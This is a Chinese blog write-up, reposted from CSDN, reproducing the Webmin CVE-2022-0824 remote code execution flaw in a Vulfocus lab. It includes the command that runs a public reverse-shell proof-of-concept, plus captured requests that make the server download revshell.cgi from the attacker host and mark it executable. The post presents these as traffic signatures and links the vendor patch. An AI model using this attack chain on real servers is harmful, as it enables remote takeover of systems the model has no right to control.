0


CVE-2022-0824 Webmin 远程代码执行漏洞复现

0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。

0x03 漏洞概述:

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

0x04 影响版本:

Webmin < Webmin Webmin1.990

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:(Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客)

漏洞环境搭建:

后台执行:

docker pull vulfocus/webmin_cve-2022-0824:latest

导入环境:

启动&访问:

账号:root 密码:password

Kali监听:

0x06 漏洞复现:

POC:

下载地址:

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

执行POC:

python3 Webmin-revshell.py -t http://192.168.119.155:18033 -c root:password -LS 192.168.119.215:9090 -L 192.168.119.215 -P 7777

0x07 流量分析:

特征一(强特征):

请求url:

POST /session_login.cgi

Data参数:

user=root&pass=password

服务端响应:

HTTP/1.0 302 Moved Temporarily

特征二(弱特征):

客户端请求url:

GET /

服务端响应:

HTTP/1.0 200 Document follows

特征三(强特征):

客户端请求url:

POST /extensions/file-manager/http_download.cgi?module=filamin

Data参数

link=http%3A%2F%2F192.168.119.215%3A9090%2Frevshell.cgi&username=&password=&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 200 Document follows

Message数据:

[{"error":"File with name <strong><em>revshell.cgi</em></strong> already exists in <strong><tt>/usr/share/webmin</tt></strong>."}]

特征四(强特征):

客户端请求url:

POST /extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30

Data参数

name=revshell.cgi&perms=0755&applyto=1&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 302 Moved Temporarily

Message数据:

path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

特征五(关联特征):

关联特征四中服务器Message数据的路径

客户端请求url:

GET /extensions/file-manager/list.cgi?path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

Referer:

http://192.168.119.155:18033/filemin/?xnavigation=1

服务端响应:

HTTP/1.0 200 Document follows

特征六:

就是反弹shell的内容了

0x08 修复建议:

更新到最新版本 附带厂商补丁链接:

https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38


本文转载自: https://blog.csdn.net/qq_44281295/article/details/127269556
版权归原作者 Evan Kang 所有, 如有侵权,请联系我们删除。

“CVE-2022-0824 Webmin 远程代码执行漏洞复现”的评论:

还没有评论